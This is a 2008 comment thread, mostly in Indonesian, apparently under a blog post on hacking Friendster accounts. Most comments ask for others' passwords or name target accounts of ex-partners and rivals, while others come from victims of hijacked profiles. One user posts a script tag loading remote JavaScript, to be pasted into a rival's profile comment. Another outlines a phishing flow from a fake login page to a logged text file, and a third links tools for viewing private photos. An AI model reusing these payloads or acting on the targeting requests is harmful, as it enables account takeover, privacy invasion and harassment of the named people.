seseorang telah tukar pasword n emel friendster sy.skrg ni dia letak picture tak senonoh dalam album sy..masalhnya sekarang saya tidak lagi bisa masul ke akaun sy keran telah ditukar pasword n emel..sesiapa yang boleh tolong sy tolong emel sy bagaimana nak delete terus friendster..tolong yer..ni emel sy mohdkdir@yahoo.com

14 05 2008
bikiEn.cOm

luamyan bagus artikelnya emangnya udah pada nyoba apa belum nich. apa cuman iseng tok..

just visit :
Lowongan kerja
Serba gratis

15 05 2008
The_aMaT

kancut lho

22 05 2008
@nk

ajarin ngehack donk bang…. kirim ke emailku yaaa… plisss bgt ini tentang harga diri…. thx alot…

25 05 2008
WEMPY

MAS TOLONG DONG BUATIN SCRIPT BWT LAYOUTS YG BEDA DONG,COZ AQ SUDAH CAPE BANGET BUATNYA,,GMN DONG

28 05 2008
si toloy

salam…2x…🙂

oia….gw ru bljar penginnge-hack nih…
ada yang bisa bantu ga?

oia,,,ada temen gw yang butuh bantuan….
FS-nya di-“bajak” m mantan cow-nya….
klo ada yang bisa bantuin, tolong kabarin gw ya…
lwat e-mail ajah, bole2…
doeni_scout@plasa.com

thanx…

28 05 2008
shinigami...

halah… friendster membosankan… gada gunanya.
cuma gitu-gitu aja…
buat friendster mania
“mending nonton bokep aja dari pada liatin poto22 ga jelas
wkwkwkwkwkwkwkwkwkwkwk

29 05 2008
Surtinem

om yg jago nge hack…mao juga dunk, ganti password email orang. kirm ke email daku yah..

29 05 2008
uDiN

aku mau mti

30 05 2008
someon laahh

semua oRank giLa.. hehehhehehheh^^

1 06 2008
cumi

oi.. ada yg bs hack fs gw gak..
ini id nya : mantry_jupi@yahoo.com

kl ada yg bs lgsg pm ke gw, nti dikasih imbalan uang..😀

6 06 2008
wans

wah om saya kaga ngarti klo pake linux ma’lum masih baru bgt. coba yg jelas dong, mau coba nih…. bisa send ke aaaazzzzt@yahoo.com ga caranya thx om

7 06 2008
crista

Fs Ku di Hack nih.. Password ga mempan, yg dapet dari yahoo juga kaga mau. Kalo temen ku yang buka page Ku, cuma ada background emily aja tugh..
Bagaimana itu y? Tolong bantuannya ya..
Thanks

10 06 2008
iman

saya mau tanya …teman saya fs nya di hack sama orang…yaitu di mana foto semuanya di delete trus yg lebih parah lagi di kasih testimotional yg sangat banyak….. bagaimana cara membalasnya saya pusing dah cari kemana mana gag ketemu cara membalasnya …tapi nama hack orang yg acak acak itu saya punya…bagaiman cara balasnya terimaksih…

11 06 2008
yuda

bos, fs gw d hack orang neh…bantuin gw dong gimana caranya buat ngembaliin fs gw..!!! gw jadi kaga bisa login neh…
tolong banget dunk….
piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz..piiizz..piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz…piiizz..piiizz..piiizz…piiizz..piiizz..piiizz

12 06 2008
fit

mas…bisa tolongin gak?
fs saia ada yg ganti email ma pass na :(( jd na saia gak bisa log in sama sekali :((
plzzz…..tolongin yak
email saia b0n3k4_kecil@yahoo.com

12 06 2008
fit
12 06 2008
fit

ralat mas…b0n3k4_kecil@yahoo.co id🙂

plzz…bantuin yak mas…

12 06 2008
Odji

Mas…
tlngn dng…
gmn sh cr ny hack Fs org….
Tlg y Mas…
krmn aj k Fs saya Mas…
fitra_rozi@yahoo.com

makasih y Mas….

12 06 2008
nabilaaaaaa

ngebuat filenya gimana? ga ngerti…

13 06 2008
hendri s

mas chaidir sudah tak coba tapi tak berasil ada cara yang lain tidak buat ngehack pasword fs?
tolongin dong dengan sangat cariin paswordnya fs cweku yellow_arie11@yahoo.com kalau sudah ketemu minta di kirim ke emailku dong hendrisaputra@dugem.com tolongin ya mas hacker2 yang sudah profesional. . . thanks

13 06 2008
hendri s

mohon bantuannya . . .kalau ada yang bisa. .
mas chaidir sudah tak coba tapi tak berasil ada cara yang lain tidak buat ngehack pasword fs?
tolongin dong dengan sangat cariin paswordnya fs cweku yellow_arie11@yahoo.com kalau sudah ketemu minta di kirim ke emailku dong hendrisaputra@dugem.com tolongin ya mas hacker2 yang sudah profesional. . . thanks

17 06 2008
Friendster Palsu « Waqfin’s Weblog

[…] Friendster Palsu Hack Friendster […]

17 06 2008
renz

kasi tau aku cara hack FS

18 06 2008
Panji

pesan2nya mantap………………………………..

19 06 2008
angga

cara hack FS g mna sh

20 06 2008
BENR BANGET !!!!!!

Tapi Mas,, kesian juga buat yg Kena CRACK,,
contohnya saia,,, bisa bantuin nge-Crack pswrd FS saia ???

I’M NOT FRIENDSTER ADDICT !!!!

21 06 2008
eunike

sapa disini yang mau aku mintai tolong nge hack frenster?

21 06 2008
dadit

bisa tolongin hackin fs ga??
gua minta tolong nih
ada orang temen gua yang rese banget ngejelek2in gua di fsnya
makanya gua minta tolong hackin fsnya dia
tolong ya
ni nama e-mail fsnya
Heartz_cruiez4ever@live.com

21 06 2008
dadit

bisa tolongin hackin fs ga??
gua mau minta tolong nih
hackin temen gua
nih nama e-mail fsnya
HearTZ_crUIeZ4ever@live.com

21 06 2008
dadit

tolongin gue ya
please

21 06 2008
dadit

nama e-mailnya yang bener yang bawah
yang ada huruf besarnya yang HearTZ

23 06 2008
anakhilang

tolong ajariin hack FS dong
plz kirimin tutorialnya
ke dodon_markodon@yahoo.co.id
makasi

23 06 2008
GreeN BananA

redirect apaan sih?
gw mau tau dasar2nya dulu..

23 06 2008
not Diablo

ga isa bang…….
udah aq tes ga berhasil…………………………..
gi mna sich payah

24 06 2008
eko

tolong kirimin cara bwt merubah email yahoo kita sndiri,,,
dan cara bobol password fs,,

kirim ke email w d: eko136@dada.net

terimakasih

30 06 2008
vodkabuster

klo ad yg bsa hack cc

krim ke ym q y. . .

id ym:vodkabuster

thX, ,, , ,

10 07 2008
Kucing

Mas2 tolong daku dunx

fsQ dHack entah siapa.

tolong cariin passwordnya yah

alamatnya kompilasi_a5@plasa.com

kirim ke email: makansandal@yahoo.co.id

plisss….

tu satu2 hiburan kalo lagi sepi…

10 07 2008
Kucing

oh ya…
yang tadi itu
alamat profilnya

http://profiles.friendster.com/kompilasi

thx

11 07 2008
xaine_virus

hack yang berbobot internet banking

12 07 2008
Kucing

Mas2 tolong daku dunx

fsQ dHack entah siapa.

tolong cariin passwordnya yah

alamatnya kompilasi_a5@plasa.com

alamat profilnya

http://profiles.friendster.com/kompilasi

kirim ke: kucingmaling@yahoo.co.id

karena yang
makansandal@yahoo.co.id

kena hack jga

plisss….

maaf merepotkan
THX

12 07 2008
hacking fs

tolong hack fs gue dunkz klu ada yang bisa

my chemical romance (MCR)

14 07 2008
benny

Mas2 ada yang bisa bantuin ngk???
fs aq d hack oleh orang iseng truz ada tampilan detasemen antiteror jablay lagi truz pasword aq diubah pantesan aq ngk bisa buka fs
kurang ajar tuh org ngk ada kerjaan apa****
jdi org ngk bisa fs aq
tolong dong kasih saran ke bennyiman@yahoo.com

14 07 2008
benny

Mas2 ada yang bisa bantuin ngk???
fs aq d hack oleh orang iseng truz ada tampilan detasemen antiteror jablay lagi truz pasword aq diubah pantesan aq ngk bisa buka fs
kurang ajar tuh org ngk ada kerjaan apa****
jdi org ngk bisa fs aq
tolong dong kasih saran ke bennyiman@yahoo.com
Makasih byk sebelumnya

15 07 2008
BObby M

Orang Indonesia cuma tau ngerusakin aja, tapi memperbaikinya tidak bisa…. Apalagi Ngebuat sesuatu yang Inovatif misalnya kayak friendster. Klo ada niat untuk bikin sesuatu yang bermanfaat ya… usaha dong bro & Sis jangan kerjanya jahil aja. yANG PERLU DIPAMER ITU KREATIVITAS UNTUK MEMBUAT SESUATU, BUKAN KREATIVITAS UNTUK MERUSAK…….

17 07 2008
Raisa

Aku newbie. Kalo ngehack friendster bisa ngeliat profile dan message yang dikunci ? Apa bisa dapat email dan password dari url nya ? Kalo bisa discuss lewat pm. tks

19 07 2008
iNez

ajarin caranya donk!!!
gw pgn bgt jd hacker
aaarrrgghh…

19 07 2008
popuri

fs gue di hack! tapi udah ngerti kok! thans a lot to this site! sangat membantu!! really!🙂

22 07 2008
ien

mas tolong kirimin gimana cara na mehack fs ato cara mendapat kan pasword na…

cz fs sayag di hancur kan oleh lulabi..hikzzz

tolong bgt ya,kirimin ke mail saya.. luph.mocacino@yahoo.com

trimakasih banyak ya buat semua na.

22 07 2008
Mayura

Boz, perlu bantuan untuk hack FS yang baru.
Kalo untuk maslah redirect, kayanya udah gak isa. Sekarang ini yang saia pakai ntu teknik soceng, lewat testi. Masuk ke friendster.html yang dibuat sendiri, redirect ke login.php, baru masuk ke file.txt yang udah saia hostingin. Tapi teknik ntu jarang kena…

Yang mau ditanyakan, ada gak teknik pada saat si target login n melihat profilenya sendiri, langsung “dilempar” ke halaman login?
Saia googling, tapi jarang menemukannya yang itu…

Maap boz, masi cupu…
^^

Makasi sebelumnya…
Mohon repplynya ke email aja…
Thx banyak…

24 07 2008
Niki

Cuma org norak dan org geblek deh yang kerjaannya ngehack friendster, hahahaha…….gua punya nih profile org yang kerjaanya suka ngehack fs org lain.

24 07 2008
aqu

mas tolong banget sih bantuin aqu,, ada orang yang sirik ma saya ngejailin fs saya,,,

gmn caranya saya ngambil passwordnya ya mas???

pliz banget,,,soalnya gak ngerti tu bahasa yang ada di atas,,

tolong bls ke ilubhmyself@yahoo.com

terima kasih

26 07 2008
RenaL

Gimana sih caranya nge hack fs orang ?
aq gag ngerti yg ada di atas

26 07 2008
putra

bos bantuin w dunk coz fs w di hack sama pacar dari mantan w…dia gk senang ma w …padahal w gk pnya salah kx ma dia….temen di fs w dah lumayan banyak n w dah susah payah bikin tuh fs….pliz bantuin w y….

29 07 2008
c0d3rut

sekedar memberitahu bahwa web tersebut udah basi

nih contohna

http://www.friendster.com/anoer

30 07 2008
cqooo

PUTRA WROTE : bos bantuin w dunk coz fs w di hack sama pacar dari mantan w…dia gk senang ma w …padahal w gk pnya salah kx ma dia….temen di fs w dah lumayan banyak n w dah susah payah bikin tuh fs….pliz bantuin w y….
————————————————————–

klo yg gituan..saya pux solusi lwad Comment aja

Coba kmuhh kasi comment ke pacar dari mantan kmuh.. ^_^

ini isi commentx ►
—————————————————————————
<script src=’http://www.geocities.com/dontdisturb_01/riiper/seepQka/By_cqoo.txt’></script>
—————————————————————————
ini code tggal kmuh copas ke commentx

30 07 2008
cqooo

<script src=’http://www.geocities.com/dontdisturb_01/riiper/seepQka/By_cqoo.txt’></script>

1 08 2008
echizen

can you get the pasword of this friendster acount?aiz87@yahoo.com
plz send the pasword to ecritz@yahoo.com.. plz
plz.. tnx n advans

1 08 2008
EthicalHacker

What the fuck?! Why the hell you don’t speak English?! I can’t understand if what the fuck you are talking about!! Poor people don’t even know how to speak English! Damn it! Get some English lessons in your high school level first…

4 08 2008
JkaSmbung

kren abiz!!!!
bwat org yg ska FS-an… bner kta mas chaidir, ngPain maen FS??? ngAbizin duit doank….. mndingan blajar ttg program compuer…..

7 08 2008
fiqri

sory bih…

sumpah aku ga ngerti…maksudx gna sc??

bls ke email ku…gpl

ku sangat mengharapkannya…

thanks

9 08 2008
flypho3nix

BUAT PARA KOMENTATOR.
Hari gini masih nyerang orang awam. Kalo cuma friendster, itu sih kacangan. Namain diri hacker koq nyerangx friendster. gak bisa liat orang senang ato cemburu dengan friendster orang. Kalo hacker bukan ngancurin friendster, Tapi serverx sekaligus. Bukankah itu akan menjadi SUPER FUN buat kita.
BTw satu lagi.
buat EthicalHacke “I can’t understand if what the fuck you are talking about”.
regular english koq kalimatnya kacau.
Just move out u’r fucki N’ ass from this comment bar
better if u try to fucki N’ learn, fucki N’ understood what you’ve said before leave your fucki N’ comment.

POST-AN YANG CUKUP BERISI. THX

9 08 2008
panne

diusilin rasanya gak enak, ngapain ngusilin orang

11 08 2008
NoBody_NoThing

wow

it’s nice thing to do… but please do it in simple way!!!!
and don’t play around with your fuckin’ knowledge ’bout hackin’ FS… don’t do it in order to crash… remember, a great hacker never show up n boast ’bout bullshit…

11 08 2008
za

ahh binun,ajarin dun ngehack na..

parahhh neh…gmn cara download Macromedia Flash na??

help me…

12 08 2008
the hunter

sip dah gw mo nyoba

12 08 2008
Hacking FS Buat Pemula | GagasMedia.Com

[…] Pesan Chaidir […]

12 08 2008
vEre

aku ga ngerti….
aku ga pernah ngehack sblumnya.

tapi aku bener-bener pengen liat fsnya inda yang dia lock profile.
please tolong ajarin ya ka…

dia uda ngerebut suami ade aku. ade aku lagi hamil 9 bulan, pas mau ngelahirin pas ditinggal robert. aku cuma mau tau wanita seperti apa dia….

thanks ya kaka

13 08 2008
g0-BLo9 awuR2an

gmna tak coba kok g bsa,o0m,,,

14 08 2008
BuKy_BGT

Gw kgk bs caranya,,,

15 08 2008
trialll

gimana caranya nge-hack FS pake windows ? ada orang nyebelin nehh..
please kasih tau yea !

17 08 2008
SontoLoyo

Gimana Caranya,………
Kentut Diem2 Tp ga Ketauan..
Hayoo ada yg bisa ga??
terserah mau pake linux kek atau windows..ckkkckkk
kl bisa Jenius brarti!!

18 08 2008
leon

misi mas tlg tips dan trik untuk bobol friendster plis!!!
ke leon132890@yahoo.com

24 08 2008
saveorangutan

air…air…air…..ada yg mau beli air mineral…?

24 08 2008
penchenk

thanks om ats infonya

24 08 2008
Blogger Bikin Rekor ! » Hacking FS

[…] Pesan Chaidir […]

24 08 2008
Cara Merusak FS « Download MP3 Gratis

[…] Pesan Chaidir […]

25 08 2008
zernita

Mas

aq lupa passw aq di fs
search zernitaearly@yahoo.com
pls send pass nya ke zernitasatu@yahoo.com

thanks

26 08 2008
exo

Suhu suhu semua ……..tolong ajarin dunk cara membajak friendster
mohon kirim panduanya yg mudah dipahami …
maklum wong ndeso yg belajar internet
via email : mrx_mdn@yahoo.co.id
tengkyu tengkyu

27 08 2008
detta

h, fs aq dihack neh, gimana cara balikinnya ya?

27 08 2008
Cw CUTe

BT….bT….Bt…..

28 08 2008
stupid_boy

another lamer..and more lamer in here

kalo ada yang btuh bantuan soal fs add YM gw aja black_4holic@yahoo.com

28 08 2008
rosyid

tolong dong punya ku kena hack, profile nya jd html semuanya yang berbau animasi pas sy login, tapi kalo profile sya di lihat dari fs orang lain ga apa???cra repair gmn ya, please.. cos dah capek2 buat fs yang bags malah jd hancur gt.. awal mulanya ada yang add ya saya aprove aja, ga ta unya hacker.. saking kesel nya dah saya delete..

28 08 2008
rosyid

ocol_170@yahoo.com itu emai saayaa, tolong y para master

28 08 2008
banger

ga friendster, ga wordpress, sama basinya! wekkk.. mending ngebokep! wkwkwkwkwk

29 08 2008
dennisa

setiap apa yang manusia lakukan akan diminta pertanggung jawaban di depan Tuhannya suatu saat kelak…

orang yang merugikan orang lain, sesungguhnya dia merugikan dirinya sendiri…

gunakan ilmu yang dimiliki untuk sesuatu hal yang baik dan berguna, bukan untuk kepuasan diri sendiri dengan merugikan orang lain…

31 08 2008
dustin

tolong donk hackin ne FS g0k1elh@yahoo.com. abis aku lupa password nya terus email nya itu sudah terlanjaur tak hapus sama aku. tolong donk….. ntu FS aQuw ndiri…. cuma tolong cariin password nya yach,,

2 09 2008
syafiq

mas tolong sayaq mendapat kan pasword na…emailku sudah ditukar sama paswod.ini punya profile sy.http://profiles.friendster.com/20369188
tolong bgt ya,kirimin ke mail saya.. yakuzablue@yahoo.com
tolg daptkn jgak pswod untuk email sayaq syafixcertain@yahoo.com
trimakasih banyak ya buat semua na.

7 09 2008
Stradievarie

Woi, mas. Kayaknya tu dah di patch lama ma FS. Tapi klu mau bagi artikel laen tentang nge-hack FS kasi tau ya…

8 09 2008
My Blog » Blog Archive » Hack Friendster

[…] Hack Friendster […]

9 09 2008
aji

tul bgt mas ak setuju ma pembenci fs hehehe…

tp cyankna yg ak pke tu windows

gmn crna nghack pke windows yah…

11 09 2008
Hack Friendster « My Blog for Everyone

[…] September 11, 2008 oleh Lahiq […]

11 09 2008
anjing

woy ribet bgt

apa biar ngerti harus blajar flash dulu ato web programingnya
masalahnya gw buta bgt yg namanya web programing apalagi flash

mohon advicenya lah lay

14 09 2008
gie

Mas Fs sya di Hack,,Pdhl Sya gak pernah gangu orang…

Gimana Ya CraNya biar Fs Sya Bner lagi…MslhNya Sya gak bisa masuk ke Comment,,krna dipindah ke situs Porno..

Jd sya gak bisa tau ada Tmn2 yang kirim comment ke Sya…

Bisa bantu ga mas???

14 09 2008
gie

tolong kirim jwbnya ke Email sya…

dtj104_00153@yahoo.com

Tolong ya mas

14 09 2008
iik --

mas tolong dong bantuin cara nge hack fs dengan bahasa anak muda yaa artkiel itu terlalu pusink bahasanya ya ya pliss lahh pliss ok .. girlcankillme@yahoo.com ……… ada ym ngga ?

14 09 2008
haters FS

Step2 cara nge hack fs biar saya bisa taw password dan emailnya gimana yaa ..
saya sudah kesal sama teman2 saya yang di fs .. ngeledekin truss hha tuh kn jadi curhat hahaha .. tolong yaa mass …. girlcankillme@yahoo.com

14 09 2008
mike

thank’s man atas infonya,berguna bgt buat gw..jd bs bls org yg ngehack gw, thank’s sekali lg bro…

14 09 2008
Odie

betol tuh…
ngabisin uang ajah ngurusin Friendster…
Narsis is Asshole!!!

15 09 2008
Private

Nice tricks, Thanks

Biasanya seh kalo utk liat private photo aku gunain 2 link web ini

http://www.rasa-rasa.com/mambot/friendster.php >>> versi thumbnail (hemat bandwith)

http://www.rasa-rasa.com/mambot/fs.php >>> versi original (bandwith killer)

Lumayan bisa ‘ngintip2’ private photo. hehehe…

15 09 2008
raf..

i dont undestand

17 09 2008
sucker
17 09 2008
kiki
17 09 2008
17 09 2008
kiki

hack sdh klo bsa !!!!
tak ksh 5 jta

17 09 2008
kiki

asu smua !!!!
bdok smua !!!
gag bsa hack fs ku

18 09 2008
deda

broe tolongin Gw, gmn cara buat Friendster baru.
soalnya punya Gw udah di blokir orng.
tolongin Gw donk..

19 09 2008
ary

baru belajar

bagus nih bwt ngasih sadar anak2 sekolah sini supaya

menggunakan fasilitas internet bwt hal yg lebih penting

19 09 2008
opick

gw btuH inFo wt ngeHack FS…
cz ne uda mencemarkan nama baik dan merusak persahabatan..

pliZ…

bLz k email gw ja.. opick_0990@yahoo.co.id

20 09 2008
readiz

ajarin nge heck dunk……

22 09 2008
ucup666

monyonk luh semua pda bisa nya cuma ngomong doank,klo bsa tuh bgiin ilmu lo pda ama yg ga bisa dunk bru bsa nghack gtu ajj dah blagu,bangsat,keparat,
gmna indonesia mo maju klo hacker nya ajj pda ga kompak
uchup_soekamtie@yahoo.com
gw tunggu ide lo

23 09 2008
cierenk

gw gedek gw sering di hack

25 09 2008
tedi setiadi

wOOOooooy……..

gw pngen bisa ng-hack………..

cara`y gmn sich??????

gw ga ngerti sedikit pun tentang ilmu hacking fs.

yang ikhlas ajarin gw donx…………

cara2`y kirimin ke e-mail gw yach……please………

ayounx_free@yahoo.com

27 09 2008
arik

bro tlgin gw dong!!!!!
gw pengen fs gw timpil ok
&&& knp kl krim message kok sring gagal ya????
thank’s

30 09 2008
erick

cra membuka photo privet gmn..

2 10 2008
uzumaki aju

aduh saya masih bingun
saya khan pk xp
gmn caranya
yg anda jelaskan itu ok ubuntu
saya kurang bisa klw pk ubuntu
klw bisa kirim yah tutorialnya ke e-mail saya
maaf klw dah ngerepotin

2 10 2008
linda

ao,,
aq pnya fs,, tpi kok tba2 stiap aq mskin email nya kt nya salah,,,
kek nya aq ga da lha gnti2 email..
plis,, djwab iah..

n gmna ngebagusi na kek smula,,
pliz.,,,,
help,,

4 10 2008
Zzz

nyoba2x tetep gag bisa!!
Zzz… ~_~!

6 10 2008
the broken

jihaahha mantap

cuman ko biasa gk jadi yachh:-/

11 10 2008
R_Die

bro.,,.,fs tmen gua d hack,,.,.,yang kasaiannya.,.,.tu orang yang ngehack fs tmen gua.,.,ngirim comment yang ga2 ke fs cenya temen gua.,.,jadi temen ggua arus bertengkar ama cenya gara2 anjing to.,.,.,kalo blh gua minta tlng banget kasi tau gua gimana caranya biar fs yang d hack itu ga bisa k pake lagi.,.,ato hilang slamanya,.,.,.,kalo lo mau bantu.,.,gua btrima kasih banget ama lo/././.gua tunggu balesannya.,.,

11 10 2008
RmiLnM

kirim cara yg lebih gampang ke fs aku plzzz RmiLnM@yahoo.co.id

13 10 2008
ABBY

hey can u hacked this account!!pls his name is ehboy felix in friendster….pls

13 10 2008
ryubi

gila neh hackers maen seenak jidat aje ngehack, tolongin g donk bro2 kompi sekalian fs g http://profiles.friendster.com/8552067 ,
gmn caranya biar bs balik seperti semula, soalnya pernah g rubah2 smua nya eh dibalikin yg lebih parah lagi, sakit jiwa jg. Udah ngak asik neh FS, mending g lari ke Facebook….. Bagi yg bs nolong g, g ketemuin d tuh orang, tukeran ilmu2 hebat dari g

15 10 2008
gantung aji

gw ga suka depace-depace an… gak suka… pokoknya gak suka…. tititik…

15 10 2008
si cantik

kalo lu emang bisa nge bantu mending tolong benerin aja FS ini http://www.friendster.com/genteng Tolongin punya temen gw yaaaa… kaciiiannnn

16 10 2008
faisal syahril

ajarin aku donk
aku pengen banget bisa hack fs orang lain
aku jani aku g bakalan salah gunain ko

iah iah

ajarin aku

heu😀

thankz

18 10 2008
scareface

betul banget tuh…
masak ke warnet bisanya cuman buka friendster melulu??
internet tuh bukan cuma friendster aja…
cari informasi apaan kek… banyak koq yang lebih asyik dan lebih cool drpd friendster… percaya deh….
akhir kata, saya mau ngucapin: “talking-talking, you know david beckham??”

thx: scareface

20 10 2008
reda

teman gmn caranya liat private n nge HACK g pake’ MINg……??

kirim ke email bur_pirate@yahoo.com

thank sebelumnya

22 10 2008
dextart

duwh,, pliz donk ada yg bisa bantu aku gak??
friendster ake di hack😦
critanya, waktu itu add orng terus waktu udah sukses fs ku langsung ketutup sendiri, jadi aku buka lagi terus log in ulang,,
nah, kebuka tuh tapi ada tulisan TELAH DIBAJAK.! huuuhf :((
abis itu aku close halamnnya and log in lagi tapi,,,
eh, udah gak bisa,,, katanya e-mail ama passwordnya salah,,
bisa di balikin gak ya fs nya??? duh sedih banget nihh,,, klo ada yg bisa & mau bantu kirim ke >> angeliquezeyla@yahoo.com
plizzz yah,, aku tunggu…

22 10 2008
dextart

ohh iya,,, nama friendster aku >> alpacino_182@yahoo.com
terus yg hack Christina@InHere.biz
tolong yah,,,,

24 10 2008
gaa ra

masih bs g sih fs di hack ato cm sekedar liat private fot

26 10 2008
dhanchan

betul tuh! yg cm bs fs-an, apalagi yg cm bs ngata2in org di comment fs.. ga bermutu bgt.. mksi bwt info nya.. ok bgt.. tp msi lum bgitu ngerti nich,,musti bc lg… ^-^

26 10 2008
dhanchan

msi bingung… -_-
pdhl pgn ngerjain org yg uda ngata2in w lwt fsnya..
pdhl knl jg ga (mantannya co w)…

26 10 2008
dhanchan

tlg bantu aku..
hack email fs ini
bersamakitabisa@yahoo.com
pliss..

26 10 2008
adi

kok gak bisa sih boss
fs gua gak hilang hialng masih bisa diakses

26 10 2008
Resa

mas temen saia ada yg add saya..

di situnya ada tulisan new friend request,tp pas saia buka ga ada yg add saya??

ksih tau donk solusinya??

klau bisa kirim ke email saya
pliizz…

mksih

29 10 2008
Nicky

di indowebster juga ada cara mengehack fs inget jangan di hack temen lw
atau sapa lw karena ini sekedar informasi,pengetahuan
bila ada kejadian fatal maka bukan tanggung jawab kami hahaha

30 10 2008
dika

maZ saya punya FS,,
tpi pasw0rdx lupa n g bisa d buka…

gmna maZ???
kasih s0LuziX donk….
ntr kRim k e-mailQ yaCh….

4 11 2008
Jessica

Tolong balas segera yah…

Friendster saya tidak bisa dibuka…

Bagaimana cara membuka nya???

Txz…

6 11 2008
arya

mas, bisa cariin pasword dari fs nie ga:
wiwiTo _ajaaahh
nam fs nya seh gt, e-mailna ga taw….

maaf ngrepotin….
maaf…..

tu fs punya temen saya,,,
yah biar kliatan pinter gt….
hehe,

trus….
lo bisa ajarin caranya dunk,,,,
cara yang diatas saya ga ngerti,
kirim ke e-mail saya ya….

di tunggu lo….
thanksssssss bgt……

6 11 2008
mayang

hi, aq ga bgitu tau cara ngebajak password orang, cuman, kaka cowo gw lagi da masalah ma friendster.

sebelumnya, dia ga pernah maen friendster (coz lmayan gaptek), tapi tiba2 di fs, gw liat ada orang yang pake fto bahkan nomer telpon dia buat diumbar secara seksual ke umum.

gw yakin ada orang yg pengen ngejelekkin dia, coz gw tau dia ga kyak gtu.

gw harepin kamu bisa bantu aq buat ngehack tuh fs. http://www.friendster.com/dpstan2 atau name : diera, atau, id number di fsnya :83866217.

gw berani sumpah bahwa itu bukan abang gw. bahkan ketika gw konfirmasi, dya sendiri ga punya fs kyak gtu dan yang ada dia juga bingun drmana orang itu dapet foto2nya.

plis bantuin gw ya…..

7 11 2008
Inspiration

Hey, need some help. Can you please send these two password of this email?belle_poiised@hotmail.com and nizam_rp@hotmail.com…. they ruin my life:( Please help me…. and send to my email. I BEG YOU… Please!

14 11 2008
diila

makasiih tipsnya ..😉

14 11 2008
iebe

Yups…
be Stuju bGt..
Bwt PeSan yG Bwt Anak2 ABG…
yG BiSaNya cuMan BUKa2 VeeS dOaNk…

Py..
Q PiNgiN PiNter Hacker Lho..
Da Cra yG LeBiH GamPang Gag???
Cz RiBet Jah tU…
Ga ngeH Gtu…
MaklUm Jah..
Q jG MaSi ABG…
yG Baru MasUk Ke UnvrSts yG IsiNya CUaman ScRipt2 dOaNk…
Py PiNgiN Jah Gtu Jdi HAck…
AjariN dUnk…
Nie FS iebe… iebe_sweetgirl@plasa.com
Lz KsNaH Jah…
Thank’s….

15 11 2008
Harry

Seblm nya saya mau minta izin karna saya udah copy-paste Hasil karya anda d Site saya…..apabila anda kurang berkenan Kasih aja comment d Harrysiriuss.multiply.com
Nanti akan saya delete !
Thanks…..

19 11 2008
Miss

mas, tlg dong di jelasin dengn cara yg gampang di mengerti…
saya ga bgt ngerti… @_@
padahal mo coba hack fs nak skul lain… T_T

19 11 2008
Cho

Baru 5 menit yang lalu gw liat tulisan kyk gini di mahasiswaumsu.com kalo ga salah..
persis banget.. hhaha
kopas ajah dh dunia maya mah..
*om ajarin cara hack yang lbih gampang donk , thx

22 11 2008
Angga

ajarin gw bobol friendster orang seh??? please

22 11 2008
coba

alert(‘XSS BUG Ditemukan euy..”

23 11 2008
azis

prasaan testy fs udah d pacth deh, dah bag bisa yang namanya flash2an…
edit font aja susahnya bukan maen,,,

wkwkwkkww, more creative bro,,,

23 11 2008
bayangan

mang kalo tau pihak friendster bs d gantung y bro?

24 11 2008
bowo

hi all
klo mau jebol pass word fs tuch gmn y…?

29 11 2008
mR W_ZEROCOOL

eh..udahlah YA !!!!NGAPAIN JGA KITA NGEHACK FS ORANG…ORANG INDONESIA TOLOL SEMU…NGAPAIN KITA NGELAKUIN BEGITUAN..GAK PENTING..TU CUMA BISA DILAKUIN BUAT ORANG YANG GAK PUNYA KERJAAN BODOH!!!

30 11 2008
willy

terlalu ribet tuh om.sy ga tau hrus mulainya dari mana……………?please ong kasih yang gampangan sedikit.biar neh kepala ga terlalau ngebleng om.

1 12 2008
akukoe

keliatannya dah gak bisa deh bos, cara kya gituan…
friendsternya semakin pinter, pasti tulisannya error….

1 12 2008
Andi Pradana

para Hacker brengsek,,,FS gw pke di Hack segala
padahal gw ga pernah iseng ma orla,,,brengsek,,,!!

3 12 2008
dZiK
5 12 2008
danz
6 12 2008
mul

biar fs g bs ke buka lgy gmn ya?????

6 12 2008
mul

bantu ya

plizzzzzzzz

11 12 2008
Azurry
11 12 2008
febri

HAlo..KAwand LAma…ToloNg HuBuNgi EmaiL Gw….Febri_keren2003@yahoo.com
ada job sikit…pleaseeeee

12 12 2008
Reynaldo casenda@@@.

Kalau mau nge hack friendster harus tau friendter?

12 12 2008
Reynaldo casenda@@@.

he…he….
6865876487657846875638765826386782658236856287365862865786247856787655
43687685656835345453452534567645634784657863475638756834657834656
64875643685347865786 37846576478657645638654656563658367846756374657634865834656348658364563748658643
83745734759347574375874574875894757847574576575927752795727525
752597275727598278789578297582787527hhhsh
husuiyusdgiyviSIyhvfAWUIyuweuyvsshegergyehruyrjhgurhuurhygfuiryrjyirjykryrurgjuruthhur
]jerjkhguerhguehrghuerhguuyrurjuegtiiytjuyerrjhyrjyghurhgjhroeihkjfherigjroaoiotuyhsriuyurhuwrhjabyuhguyrjtihckrhdrdoijgh
rjjrighrjetgjrehyihhrgyuehdyirhygeuiohruhg7yehrygiehuiiurrkirihhygtuthggurju8rujuyfhrve
hdywhhegyuwhbehbeygvyhehebngehackuyyhuwiehuhweuhuwiehuiwehuihwekontolgyqtygdtggg
ggdgyuguwgeyugaldolovegabyisqhyihwyehwhhehihweihihihiwihwhwhhrwhwhwhgwggigiwrggwigwig
uiwrhuiwrhuihruhuirhuihruihruifheruihuiehruiheriuhfirhuifgwhygbrjyfjrggrh6fgr6byeuterjhgygrujyegyeduurgydoy7dfbyghyr
bhuyhryhgufjrurtjurthtikuyrtkiihfgihdiuhrkkjyhuifghuyruihuyrejihgyhuy

12 12 2008
bleedinginside

mas… tolong hack FS ndu_kirana@walla.com
pliss… kirim passnya ke mail gw

12 12 2008
angga

dah da yang baru gak? kasih tahu ane yach

thkx

13 12 2008
Blee

Alaaaahhh,,, basi yg ngehack fs kya gitu… pke safe mode juga langsung ilang… ada yg bisa lngsung ngilangin fs ga,,,, tanpa di klik sang penerimanya,,,
klo ada gw mau bgt tuh.

15 12 2008
NuriL

waa wii wuuu

puaanjaangg bgt…

ada cara yg lebih gampang gituu??

yg sederhana ajaa…

gak pke install segalaaaa

haa hii huuu

15 12 2008
fahrurrozi hakim

hei2 bantuin gue donk
biar fs gue balik lagi please!
sumpah gue sedih bgt fs gue tmennya dh 1000an lbih comentnyapun dh 7000 lebih please

16 12 2008
Aormybyte

thanks bro link back me

18 12 2008
aL

Salam,

hey mau voucher pulsa gratis gak?

